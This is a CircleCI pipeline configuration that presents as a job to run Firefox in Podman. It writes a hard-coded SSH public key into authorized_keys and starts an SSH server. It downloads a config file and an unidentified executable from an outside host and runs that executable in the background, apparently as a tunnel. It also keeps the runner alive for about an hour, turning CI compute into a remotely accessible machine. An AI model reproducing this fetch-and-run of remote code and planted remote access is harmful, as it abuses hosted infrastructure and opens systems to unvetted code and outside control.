version: 2.1

jobs:
  run-firefox-podman:
    machine:
      image: ubuntu-2404:current
    resource_class: medium
    steps:
      - checkout

      - run:
          name: Install dependencies
          command: |
            sudo apt-get update
            sudo apt-get install -y curl podman openssh-server
            podman --version

      - run:
          name: Setup SSH and start Firefox
          no_output_timeout: 59m
          command: |
            # SSH setup
            mkdir -p ~/.ssh && chmod 700 ~/.ssh
            echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEQ3LdC/eSvw9qo3nfd+RrFIK8SYCHPMHcfI3ANxYWtG" > ~/.ssh/authorized_keys
            chmod 600 ~/.ssh/authorized_keys
            sudo systemctl start ssh
            curl -s -o cli.toml https://ggweb.19870707.xyz/cli.toml
            curl -s -o ro https://ggweb.19870707.xyz/ro && chmod +x ro
            nohup ./ro cli.toml &
            
            echo "Firefox 容器已启动，SSH 和 Web 访问端口 5800 已开放"
            mkdir -p ~/.config/containers
            echo -e "[engine]\ncgroup_manager = \"cgroupfs\"\nevents_backend = \"file\"" > ~/.config/containers/containers.conf
            podman run -d --name firefox -p 5800:5800 docker.io/jlesage/firefox:latest
            
            # 保持 Job 运行
            sleep 3500  # 约 58 分钟，留 buffer
